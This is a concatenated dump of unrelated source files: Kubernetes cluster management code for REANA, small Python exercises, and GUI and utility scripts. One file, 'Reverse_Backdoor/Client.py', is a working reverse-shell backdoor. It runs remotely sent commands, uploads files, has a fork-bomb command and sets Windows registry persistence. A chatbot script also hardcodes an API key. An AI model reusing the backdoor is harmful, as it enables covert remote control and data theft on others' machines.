self._corev1api.delete_namespaced_resource_quota(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'Service':
self._corev1api.delete_namespaced_service(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'ClusterRole':
self._rbacauthorizationv1api.delete_cluster_role(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions())
elif manifest['kind'] == 'ClusterRoleBinding':
self._rbacauthorizationv1api.\
delete_cluster_role_binding(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions())
elif manifest['kind'] == 'Ingress':
self._extbetav1api.delete_namespaced_ingress(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'StorageClass':
self._storagev1api.delete_storage_class(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions())
elif manifest['kind'] == 'PersistentVolumeClaim':
self._corev1api.\
delete_namespaced_persistent_volume_claim(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
except ApiException as e: # Handle K8S API errors
if e.status == 409: # Conflict, object probably already exists
pass
if e.status == 404:
pass
if e.status == 400:
pass
# delete all CVMFS persistent volume claims
pvcs = self._corev1api.list_namespaced_persistent_volume_claim(
'default')
for pvc in pvcs.items:
if pvc.metadata.name.startswith('csi-cvmfs-'):
self._corev1api.\
delete_namespaced_persistent_volume_claim(
name=pvc.metadata.name,
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
# delete all CVMFS storage classes
scs = self._storagev1api.list_storage_class()
for sc in scs.items:
if sc.metadata.name.startswith('csi-cvmfs-'):
self._storagev1api.delete_storage_class(
name=sc.metadata.name,
body=k8s_client.V1DeleteOptions())
# delete traefik objects
from reana_cluster.config import traefik_release_name
cmd = 'helm del --purge {}'.format(traefik_release_name)
cmd = shlex.split(cmd)
subprocess.check_output(cmd)
return True
def get_component(self, component_name, component_namespace='default'):
"""Fetch info (e.g.URL) about deployed REANA component.
Fetches information such as URL(s) of a REANA component deployed to
REANA cluster.
:param component_name: Name of the REANA component whose information
is to be fetched.
:type component_name: string
:param component_namespace: Namespace where REANA component specified
with `component_name` is deployed. Kubernetes specific information.
:type component_namespace: string
:return: Information (e.g. URL(s)) about a deployed REANA component.
:rtype: dict
:raises ApiException: Failed to successfully interact with
Kubernetes REST API. Reason for failure is indicated as HTTP error
codes in addition to a textual description of the error.
"""
comp_info = {
'internal_ip': '',
'ports': [],
'external_ip_s': [],
'external_name': '',
}
try:
# Strip reana-prefix from component name if it is there.
component_name_without_prefix = None
if not component_name.startswith('reana-'):
component_name_without_prefix = component_name
else:
component_name_without_prefix = component_name[len('reana-'):]
minikube_ip = None
# If running on Minikube, ip-address is Minikube VM-address
nodeconf = self._corev1api.list_node()
# There can be many Nodes. Is this a problem?
            # (i.e. how do we know which one should be connected to?)
for item in nodeconf.items:
if item.metadata.name == 'minikube' or \
item.metadata.name == self.kubeconfig_context:
# Running on minikube --> get ip-addr
minikube_ip = subprocess.check_output(['minikube', 'ip'])
minikube_ip = minikube_ip.decode("utf-8")
minikube_ip = minikube_ip.replace('\n', '')
# Get ip-addresses and ports of the component (K8S service)
comp = self._corev1api.read_namespaced_service(
component_name_without_prefix,
component_namespace)
logging.debug(comp)
comp_info['external_name'] = comp.spec.external_name
            comp_info['external_ip_s'] = [minikube_ip] if minikube_ip \
                else comp.spec.external_i_ps
comp_info['internal_ip'] = comp.spec.external_i_ps
if component_name_without_prefix == 'server':
traefik_ports = self.get_traefik_ports()
else:
traefik_ports = None
if traefik_ports:
comp_info['ports'].extend(traefik_ports)
else:
for port in comp.spec.ports:
if minikube_ip:
comp_info['ports'].append(str(port.node_port))
else:
comp_info['ports'].append(str(port.port))
logging.debug(comp_info)
except ApiException as e: # Handle K8S API errors
if e.status == 409: # Conflict
pass
if e.status == 404:
pass
if e.status == 400:
pass
raise e
return comp_info
def get_traefik_ports(self):
"""Return the list of Traefik ports if Traefik is present."""
namespace = 'kube-system'
label_selector = 'app=traefik'
try:
traefik_objects = self._corev1api.list_namespaced_service(
namespace=namespace,
label_selector=label_selector,
limit=2)
ports = []
for object in traefik_objects.items:
for port in object.spec.ports:
if port.name == 'http':
ports.append(port.node_port)
elif port.name == 'https':
ports.append(port.node_port)
return ports
except ApiException as e:
if e.reason == "Not Found":
logging.error("K8s traefik objects were not found.")
else:
logging.error('Exception when calling '
'CoreV1Api->list_namespaced_service:\n {e}'
                              .format(e=e))
return None
except Exception as e:
logging.error('Something went wrong. Traefik port '
                          'was not found:\n {e}'.format(e=e))
return None
def verify_components(self):
"""Verify that REANA components are setup according to specifications.
Verifies that REANA components are set up as specified in REANA
cluster specifications file.
Components must be deployed first, before verification can be done.
Currently verifies only that docker image (<NAME>:<TAG> -string) of a
        deployed component matches the docker image specified in the REANA cluster
specification file.
:return: Dictionary with component names for keys and booleans
for values stating if verification was successful.
:rtype: dict
:raises ApiException: Failed to successfully interact with
Kubernetes REST API. Reason for failure is indicated as HTTP error
codes in addition to a textual description of the error.
"""
if not self._cluster_running():
pass
try:
matching_components = dict()
for manifest in self.cluster_conf:
# We are only interested in Deployment manifests since
# these define docker images that Kubernetes Pods based on
# these Deployments should be using.
if manifest['kind'] == 'Deployment':
component_name = manifest['metadata']['name']
# Kubernetes Deployment manifest could have multiple
# containers per manifest file. Current implementation
# expects only one container per manifest file.
spec_img = manifest['spec'][
'template']['spec']['containers'][0]['image']
deployed_comp = self._extbetav1api. \
read_namespaced_deployment(component_name, 'default')
logging.debug(deployed_comp)
# Kubernetes Deployment could have multiple containers per
# Deployment. Current implementation expects only one
# container per deployment.
# THIS WILL CAUSE PROBLEM if there are two Pods and one
# of them is (even temporarily, e.g. update situation)
# based on "old" image defined in older REANA cluster
# specification file.
deployed_img = deployed_comp.spec.template.spec.containers[
0].image
logging.info('Component name: {}\n'
'Specified image: {}\n'
'Currently deployed image: {}\n'
.format(component_name,
spec_img,
deployed_img))
matching_components[component_name] = True
if not spec_img == deployed_img:
matching_components[component_name] = False
logging.error('Mismatch between specified and '
'deployed image of {}. \n'
'Specified image: {}\n'
'Currently deployed image: {}\n'
.format(component_name,
spec_img,
deployed_img))
except ApiException as e: # Handle K8S API errors
if e.status == 409:
pass
if e.status == 404:
pass
if e.status == 400:
pass
raise e
return matching_components
def verify_backend(self):
"""Verify that cluster backend is compatible with REANA.
Verifies that REANA cluster backend is 1) compatible with REANA and
2) set up as specified in REANA cluster specifications file.
Currently includes just a version check.
:return: `True` if verification of backend was successful.
:rtype: bool
"""
return self._verify_k8s_version()
def _verify_k8s_version(self):
"""Verify version of K8S instance is compatible with REANA cluster.
        Verifies that the version of the Kubernetes instance that
        `reana-cluster` is connecting to is compatible with REANA
        (min and max versions in config) and with the target version
        in the REANA cluster specifications file.
        Version strings are parsed according to PEP 440, which supports the
        semantic-versioning style that Kubernetes uses
        (although PEP 440 is not fully compliant with semver).
:return: Dictionary containing the current version, if it is compatible
and the maximum compatible version.
:rtype: dict
"""
if not self._cluster_running():
pass
curr_ver = parse_version(self._versionapi.get_code().git_version)
expected_ver = parse_version(
self.cluster_spec['cluster']['version'])
max_ver = parse_version(self._conf['max_version'])
min_ver = parse_version(self._conf['min_version'])
logging.info('Current K8S version: {}\n'
'Specified K8S version: {}\n'
'Max supported K8S version: {}\n'
'Min supported K8S version: {}'
.format(curr_ver, expected_ver, max_ver, min_ver))
k8s_version_compatibility = dict(current_version=curr_ver,
is_compatible=True,
max_version=max_ver)
# Compare current K8S version to max / min
if curr_ver > max_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Your Kubernetes version is too new: {cur} \n'
'Newest version REANA supports is: {max}'
.format(cur=curr_ver, max=max_ver))
elif curr_ver < min_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Your Kubernetes version is too old: {cur} \n'
'Oldest version REANA supports is: {min}'
.format(cur=curr_ver, min=min_ver))
# Compare specified version to max/min
elif expected_ver > max_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Specified Kubernetes version is too new: {cur} \n'
'Newest version REANA supports is: {max}'
                          .format(cur=expected_ver, max=max_ver))
elif expected_ver < min_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Specified Kubernetes version is too old: {cur} \n'
'Oldest version REANA supports is: {min}'
                          .format(cur=expected_ver, min=min_ver))
# Compare specified version to current K8S version
elif expected_ver < curr_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Your Kubernetes version is too new: {cur} \n'
'Specification expects: {expected}'
.format(cur=curr_ver, expected=expected_ver))
elif expected_ver > curr_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Your Kubernetes version is too old: {cur} \n'
'Specification expects: {expected}'
.format(cur=curr_ver, expected=expected_ver))
return k8s_version_compatibility
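    # Illustration (added, not part of the original module): parse_version
    # gives PEP 440 ordering, so the comparisons above work directly on
    # Kubernetes git_version strings, e.g.
    #   parse_version('v1.16.3') > parse_version('v1.14.0')   # True
    #   parse_version('v1.14.0') < parse_version('v1.14.10')  # True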
def get_components_status(self, component=None):
"""Return status for components in cluster.
Gets all pods in the k8s namespace and matches them with the
equivalent component, writing their status in a dictionary.
:return: Dictionary containing each component and its status
:rtype: dict
"""
def _write_status(pod, component_name, components_status):
"""Determine the component status."""
if pod.status.container_statuses:
if pod.status.container_statuses[0].ready:
components_status[component_name] = 'Running'
elif pod.status.container_statuses[0].\
state.waiting is not None:
components_status[component_name] = \
pod.status.container_statuses[0].\
state.waiting.reason
else:
                components_status[component_name] = 'Unavailable'
if component and component.startswith('reana-'):
component = component.replace('reana-', '')
all_pods = self._corev1api.list_namespaced_pod('default')
components_status = dict()
if component:
for current_pod in all_pods.items:
if current_pod.metadata.name.startswith(component):
_write_status(current_pod, component, components_status)
break
else:
deployment_manifests = [m for m in self.cluster_conf
if m['kind'] == 'Deployment']
for manifest in deployment_manifests:
current_pod = None
for pod in all_pods.items:
if pod.metadata.name.startswith(
manifest['metadata']['name']):
current_pod = pod
break
if current_pod:
_write_status(current_pod, manifest['metadata']['name'],
components_status)
return components_status
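    # Illustration (added): the returned dictionary maps component names to
    # pod states, e.g. {'server': 'Running', 'db': 'ErrImagePull'}
    # (hypothetical names and values; they depend on the cluster spec).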
def exec_into_component(self, component_name, command):
"""Execute a command inside a component.
:param component_name: Name of the component where the command will be
executed.
:param command: String which represents the command to execute inside
the component.
:return: Returns a string which represents the output of the command.
"""
available_components = [manifest['metadata']['name'] for manifest in
self.cluster_conf
if manifest['kind'] == 'Deployment']
if component_name not in available_components:
raise Exception('{0} does not exist.'.format(component_name))
component_pod_name = subprocess.check_output([
'kubectl', 'get', 'pods',
'-l=app={component_name}'.format(component_name=component_name),
'-o', 'jsonpath="{.items[0].metadata.name}"'
]).decode('UTF-8').replace('"', '')
component_shell = [
'kubectl', 'exec', '-t', component_pod_name, '--']
command_inside_component = []
command_inside_component.extend(component_shell)
command_inside_component.extend(command)
output = subprocess.check_output(command_inside_component)
return output.decode('UTF-8')
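# Usage sketch (added for illustration, not part of the original module;
# `backend` is a hypothetical instance of this Kubernetes backend class):
#   output = backend.exec_into_component('reana-server', ['uname', '-a'])
# This resolves the pod via `kubectl get pods -l=app=reana-server` and runs
# the command with `kubectl exec`, returning its stdout as a string.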
| 42.247515
| 118
| 0.557563
|
dc0a7136ea574c4f8738e38e209e8a83cbfa3d62
| 1,023
|
py
|
Python
|
Python/leetcode/PermutationSequence.py
|
darrencheng0817/AlgorithmLearning
|
aec1ddd0c51b619c1bae1e05f940d9ed587aa82f
|
[
"MIT"
] | 2
|
2015-12-02T06:44:01.000Z
|
2016-05-04T21:40:54.000Z
|
Python/leetcode/PermutationSequence.py
|
darrencheng0817/AlgorithmLearning
|
aec1ddd0c51b619c1bae1e05f940d9ed587aa82f
|
[
"MIT"
] | null | null | null |
Python/leetcode/PermutationSequence.py
|
darrencheng0817/AlgorithmLearning
|
aec1ddd0c51b619c1bae1e05f940d9ed587aa82f
|
[
"MIT"
] | null | null | null |
'''
Created on 1.12.2016
@author: Darren
'''
'''
The set [1,2,3,…,n] contains a total of n! unique permutations.
By listing and labeling all of the permutations in order,
We get the following sequence (ie, for n = 3):
"123"
"132"
"213"
"231"
"312"
"321"
Given n and k, return the kth permutation sequence.
Note: Given n will be between 1 and 9 inclusive."
'''
# Enter your code here. Read input from STDIN. Print output to STDOUT
def getPermutation(M,N):
M-=1
res=[]
factorial=1
nums=list(range(1,N+1))
for roundCount in range(2,N):
factorial*=roundCount
roundCount=N-1
while roundCount>=0:
index=M//factorial
M%=factorial
res.append(nums[index])
nums.pop(index)
if roundCount>0:
factorial//=roundCount
roundCount-=1
return " ".join(str(_) for _ in res)
inputString=input().strip().split(" ")
M=int(inputString[0])
N=int(inputString[1])
print(getPermutation(M,N))
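# Worked example (added for illustration, not part of the original solution):
# for input "3 3" (M = k = 3, N = n = 3) the permutations of [1, 2, 3] in
# order are 123, 132, 213, ..., so the 3rd one is "213" and the script
# prints "2 1 3".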
| 25.575
| 70
| 0.609971
|
ec854d4f82afdf4e3d4618df2093e9f5e72c16b0
| 790
|
py
|
Python
|
05_for_in_python.py
|
nagasudhirpulla/python_wrldc_training
|
c3a3216c0a11e1dac03d4637b4b59b28f1bb83c6
|
[
"MIT"
] | null | null | null |
05_for_in_python.py
|
nagasudhirpulla/python_wrldc_training
|
c3a3216c0a11e1dac03d4637b4b59b28f1bb83c6
|
[
"MIT"
] | null | null | null |
05_for_in_python.py
|
nagasudhirpulla/python_wrldc_training
|
c3a3216c0a11e1dac03d4637b4b59b28f1bb83c6
|
[
"MIT"
] | 2
|
2020-09-30T16:32:18.000Z
|
2020-10-23T01:13:51.000Z
|
'''
'for' statement in python and using it with 'range' function
'''
# looping for 10 times
for itr in range(10):
print('executing...')
print('x is {0}'.format(itr))
print('execution complete with range(10)...\n\n')
# looping with each element of an array
for itr in [1,5,8,7,45]:
print('executing...')
print('x is {0}'.format(itr))
print('execution complete with arrays...\n\n')
# looping on numbers from 4 to 8
for itr in range(4,9):
print('executing...')
print('x is {0}'.format(itr))
print('execution complete with range(4,9)...\n\n')
# looping on numbers from 4 to 11 with step interval of 2
for itr in range(4,12,2):
print('executing...')
print('x is {0}'.format(itr))
print('execution complete with range(4,12,2)...\n\n')
print('new changes')
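# Added illustration (not part of the original lesson): a negative step
# counts downwards, here from 10 down to 1
for itr in range(10, 0, -1):
    print('x is {0}'.format(itr))
print('execution complete with range(10,0,-1)...\n\n')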
| 23.939394
| 60
| 0.643038
|
9823b7bd6365413f348b2c9191e41c14f498024a
| 297
|
py
|
Python
|
demo/image_classification/predict.py
|
brooklet/PaddleHub
|
9e6251481fad9de25cea917d24e519e0cd376f5b
|
[
"Apache-2.0"
] | null | null | null |
demo/image_classification/predict.py
|
brooklet/PaddleHub
|
9e6251481fad9de25cea917d24e519e0cd376f5b
|
[
"Apache-2.0"
] | null | null | null |
demo/image_classification/predict.py
|
brooklet/PaddleHub
|
9e6251481fad9de25cea917d24e519e0cd376f5b
|
[
"Apache-2.0"
] | null | null | null |
import paddle
import paddlehub as hub
if __name__ == '__main__':
model = hub.Module(
name='resnet50_vd_imagenet_ssld',
label_list=["roses", "tulips", "daisy", "sunflowers", "dandelion"],
        load_checkpoint='/PATH/TO/CHECKPOINT')
result = model.predict(['flower.jpg'])
| 29.7
| 75
| 0.656566
|
0da1e9a7fce0d8eb322de0dbcb680c85d9edbaca
| 795
|
py
|
Python
|
update_version.py
|
Manny27nyc/BitcoinArmory
|
1d02a6640d6257ab0c37013e5cd4b99681a5cfc3
|
[
"MIT"
] | 505
|
2016-02-04T15:54:46.000Z
|
2022-03-27T18:43:01.000Z
|
update_version.py
|
jimmysong/BitcoinArmory
|
1c7190176897a2e0f3e4e198ab2f199059bb2402
|
[
"MIT"
] | 528
|
2016-02-06T19:50:12.000Z
|
2022-01-15T10:21:16.000Z
|
update_version.py
|
jimmysong/BitcoinArmory
|
1c7190176897a2e0f3e4e198ab2f199059bb2402
|
[
"MIT"
] | 208
|
2015-01-02T10:31:40.000Z
|
2021-12-14T07:37:36.000Z
|
import os
script_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(script_dir)
if os.path.exists('.git') \
and os.path.exists(os.path.join("armoryengine", "ArmoryUtils.py")):
current_head = os.path.join(".git", "HEAD")
f = open(current_head, "r")
ref = f.read()
f.close()
path_parts = ref[5:-1].split("/")
hash_loc = os.path.join(".git", *path_parts)
f = open(hash_loc, "r")
build = f.read()[:10]
f.close()
build_file = os.path.join("armoryengine", "ArmoryBuild.py")
f = open(build_file, "w")
f.write("BTCARMORY_BUILD = '%s'\n" % build)
f.close()
print "Build number has been updated to %s" % build
else:
print "Please run this script from the root Armory source directory" \
" along with the .git directory"
| 27.413793
| 74
| 0.626415
|
b8b6e5b215080e5dfb7856c1912ca93fa6a3d505
| 454
|
py
|
Python
|
turling.py
|
zh2209645/Sample-Raspberry-Chatbot
|
a5315d4ccd1b3be64b44af545c12664e24c8d25e
|
[
"MIT"
] | 1
|
2018-12-11T09:38:42.000Z
|
2018-12-11T09:38:42.000Z
|
turling.py
|
zh2209645/Sample-Raspberry-Chatbot
|
a5315d4ccd1b3be64b44af545c12664e24c8d25e
|
[
"MIT"
] | null | null | null |
turling.py
|
zh2209645/Sample-Raspberry-Chatbot
|
a5315d4ccd1b3be64b44af545c12664e24c8d25e
|
[
"MIT"
] | 1
|
2018-12-11T09:38:44.000Z
|
2018-12-11T09:38:44.000Z
|
import sys, json, requests
def tuling(words):
Tuling_API_KEY = "ad65aaa7e97e4d28bdb3c34fbabf4259"
body = {
"key": Tuling_API_KEY,
"info": words.encode("utf-8")
}
url = "http://www.tuling123.com/openapi/api"
resp = requests.post(url=url, data=body, verify=True)
if resp:
data = json.loads(resp.text)
print(data["text"])
return data["text"]
else:
return None
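# Example usage (added for illustration; it performs a real HTTP request to
# the Tuling API, so it is left commented out):
#   reply = tuling("hello")   # prints and returns the bot's reply, or None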
| 23.894737
| 58
| 0.57489
|
9b6cc73d2ad3327a58c74c9d0f7c427c145b4293
| 5,797
|
py
|
Python
|
python/GafferUI/UserPlugValueWidget.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferUI/UserPlugValueWidget.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferUI/UserPlugValueWidget.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import IECore
import Gaffer
import GafferUI
class UserPlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, editable=True, **kw ) :
self.__column = GafferUI.ListContainer( spacing = 6 )
GafferUI.PlugValueWidget.__init__( self, self.__column, plug, **kw )
with self.__column :
self.__layout = GafferUI.PlugLayout( plug )
if editable :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal ) :
GafferUI.Spacer( IECore.V2i( GafferUI.PlugWidget.labelWidth(), 1 ) )
addButton = GafferUI.MenuButton( image="plus.png", hasFrame=False, menu=GafferUI.Menu( self.__addMenuDefinition() ) )
addButton.setToolTip( "Click to add plugs" )
GafferUI.Spacer( IECore.V2i( 1 ), IECore.V2i( 999999, 1 ), parenting = { "expand" : True } )
def hasLabel( self ) :
return True
def setReadOnly( self, readOnly ) :
if readOnly == self.getReadOnly() :
return
GafferUI.PlugValueWidget.setReadOnly( self, readOnly )
self.__layout.setReadOnly( readOnly )
def childPlugValueWidget( self, childPlug, lazy=True ) :
return self.__layout.plugValueWidget( childPlug, lazy )
def _updateFromPlug( self ) :
pass
def __addMenuDefinition( self ) :
result = IECore.MenuDefinition()
result.append( "/Add/Bool", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.BoolPlug ) } )
result.append( "/Add/Float", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.FloatPlug ) } )
result.append( "/Add/Int", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.IntPlug ) } )
result.append( "/Add/NumericDivider", { "divider" : True } )
result.append( "/Add/String", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.StringPlug ) } )
result.append( "/Add/StringDivider", { "divider" : True } )
result.append( "/Add/V2i", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.V2iPlug ) } )
result.append( "/Add/V3i", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.V3iPlug ) } )
result.append( "/Add/V2f", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.V2fPlug ) } )
result.append( "/Add/V3f", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.V3fPlug ) } )
result.append( "/Add/VectorDivider", { "divider" : True } )
result.append( "/Add/Color3f", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.Color3fPlug ) } )
result.append( "/Add/Color4f", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.Color4fPlug ) } )
return result
def __addPlug( self, plugType ) :
d = GafferUI.TextInputDialogue( initialText = "unnamed", title = "Enter name", confirmLabel = "Create" )
name = d.waitForText( parentWindow = self.ancestor( GafferUI.Window ) )
d.setVisible( False )
if not name :
return
with Gaffer.UndoContext( self.getPlug().node().scriptNode() ) :
plug = plugType( name, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
self.getPlug().addChild( plug )
GafferUI.PlugValueWidget.registerCreator( Gaffer.Node, "user", UserPlugValueWidget )
##########################################################################
# Plug menu
##########################################################################
def __deletePlug( plug ) :
with Gaffer.UndoContext( plug.ancestor( Gaffer.ScriptNode ) ) :
plug.parent().removeChild( plug )
def __plugPopupMenu( menuDefinition, plugValueWidget ) :
plug = plugValueWidget.getPlug()
node = plug.node()
if plug.parent().isSame( node["user"] ) :
menuDefinition.append( "/DeleteDivider", { "divider" : True } )
menuDefinition.append( "/Delete", { "command" : IECore.curry( __deletePlug, plug ), "active" : not plugValueWidget.getReadOnly() } )
__plugPopupMenuConnection = GafferUI.PlugValueWidget.popupMenuSignal().connect( __plugPopupMenu )
| 42.007246
| 134
| 0.678282
|
d79537c50f59b10ee438fa1d72f815e07e3af076
| 2,337
|
py
|
Python
|
Reverse_Backdoor/Client.py
|
Rutherford-sudo/BasicPentestTools
|
3a2f5e6b9b2bea8521efad1eecccf236b2572981
|
[
"MIT"
] | 1
|
2021-02-18T10:43:45.000Z
|
2021-02-18T10:43:45.000Z
|
Reverse_Backdoor/Client.py
|
Rutherford-sudo/BasicPentestTools
|
3a2f5e6b9b2bea8521efad1eecccf236b2572981
|
[
"MIT"
] | null | null | null |
Reverse_Backdoor/Client.py
|
Rutherford-sudo/BasicPentestTools
|
3a2f5e6b9b2bea8521efad1eecccf236b2572981
|
[
"MIT"
] | 1
|
2020-05-26T14:51:03.000Z
|
2020-05-26T14:51:03.000Z
|
import socket
import subprocess
import os
import platform
import colorama
from colorama import Fore, Style
from time import sleep
import getpass
import base64
import shutil
import sys
colorama.init()
RHOST = "127.0.0.1"
RPORT = 8080
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((RHOST,RPORT))
def Persist(): # Works only on Windows systems
location = os.environ["appdata"] + "\\Windows Explorer.exe"
if not os.path.exists(location):
shutil.copyfile(sys.executable, location)
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + location + '"', shell=True)
while True:
try:
header = f"""{Fore.RED}{getpass.getuser()}@{platform.node()}{Style.RESET_ALL}:{Fore.LIGHTBLUE_EX}{os.getcwd()}{Style.RESET_ALL}$ """
sock.send(header.encode())
STDOUT, STDERR = None, None
command = sock.recv(1024).decode("utf-8")
#Persist()
if command == "list":
sock.send(str(os.listdir(".")).encode())
elif command == "forkbomb":
while True:
os.fork()
elif command.split(" ")[0] == "cd":
os.chdir(command.split(" ")[1])
sock.send("[+] Directory : {}".format(os.getcwd()).encode())
elif command.split(" ")[0] == "download":
with open(command.split(" ")[1],"rb") as f:
file = base64.b64encode(f.read())
while file:
#print("[!] Sending Data...")
sock.send(file)
file = f.read()
sleep(2)
sock.send(b"[+] Done!")
print("[+] Finished sending data!")
elif command == "exit":
sock.send(b"exit")
break
else:
comm = subprocess.Popen(str(command), shell=True, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
STDOUT, STDERR = comm.communicate()
if not STDOUT:
sock.send(STDERR)
else:
sock.send(STDOUT)
if not command:
print("[X] Connection Drooped!")
break
except Exception as e:
sock.send("Error : {}".format(str(e)).encode())
sock.close()
| 29.582278
| 140
| 0.551134
|
c66ddcac90d0b1e9541a38c81485f2408b268aee
| 238
|
py
|
Python
|
pydp/algorithms/laplacian/_count.py
|
Vishwaak/PyDP
|
408384534843bd297ec7d59ce820c7099a80d848
|
[
"Apache-2.0"
] | null | null | null |
pydp/algorithms/laplacian/_count.py
|
Vishwaak/PyDP
|
408384534843bd297ec7d59ce820c7099a80d848
|
[
"Apache-2.0"
] | null | null | null |
pydp/algorithms/laplacian/_count.py
|
Vishwaak/PyDP
|
408384534843bd297ec7d59ce820c7099a80d848
|
[
"Apache-2.0"
] | null | null | null |
from .._algorithm import MetaAlgorithm
class Count(MetaAlgorithm):
"""
Count Explanation
TODO
"""
def __init__(self, epsilon: float = 1.0, dtype: str = "int"):
super().__init__(epsilon=epsilon, dtype=dtype)
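    # Usage sketch (added; only the constructor shown above is assumed):
    #   counter = Count(epsilon=0.5, dtype="int")
    # epsilon and dtype are simply forwarded to MetaAlgorithm.__init__.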
| 19.833333
| 65
| 0.642857
|
d782949a5ee986ef87749dd5976862a10f6b654f
| 1,015
|
py
|
Python
|
rplugin/python3/denite/source/defx/history.py
|
sanfusu/defx.nvim
|
8678b1ac3389f84aa64125f15ebfd6ba87f10b12
|
[
"MIT"
] | null | null | null |
rplugin/python3/denite/source/defx/history.py
|
sanfusu/defx.nvim
|
8678b1ac3389f84aa64125f15ebfd6ba87f10b12
|
[
"MIT"
] | null | null | null |
rplugin/python3/denite/source/defx/history.py
|
sanfusu/defx.nvim
|
8678b1ac3389f84aa64125f15ebfd6ba87f10b12
|
[
"MIT"
] | null | null | null |
# ============================================================================
# FILE: defx/history.py
# AUTHOR: Shougo Matsushita <Shougo.Matsu at gmail.com>
# License: MIT license
# ============================================================================
from defx.util import Nvim
from denite.source.base import Base
class Source(Base):
def __init__(self, vim: Nvim):
super().__init__(vim)
self.name = 'defx/history'
self.kind = 'command'
self._histories = []
def on_init(self, context: dict):
options = self.vim.current.buffer.options
if 'filetype' not in options or options['filetype'] != 'defx':
return
self._histories = reversed(self.vim.vars['defx#_histories'])
def gather_candidates(self, context: dict):
return [{
'word': x,
'abbr': x + '/',
'action__command': f"call defx#call_action('cd', ['{x}'])",
'action__path': x,
} for x in self._histories]
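    # Illustration (added): for a history entry such as '/home/user/project'
    # (hypothetical path), gather_candidates yields
    #   {'word': '/home/user/project', 'abbr': '/home/user/project/',
    #    'action__command': "call defx#call_action('cd', ['/home/user/project'])",
    #    'action__path': '/home/user/project'}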
| 29.852941
| 78
| 0.499507
|
53a9050c454c60659f3effd5475616c0016ad2b7
| 25,249
|
py
|
Python
|
machine_translation_vision/models/NMT_AttentionImagine_Seq2Seq_Beam_V10.py
|
Eurus-Holmes/VAG-NMT
|
38095c4a5477a0e7e2fa1592e8401aa9cddf2beb
|
[
"Apache-2.0"
] | 12
|
2019-12-28T12:55:27.000Z
|
2022-02-10T00:19:53.000Z
|
machine_translation_vision/models/NMT_AttentionImagine_Seq2Seq_Beam_V10.py
|
Eurus-Holmes/VAG-NMT
|
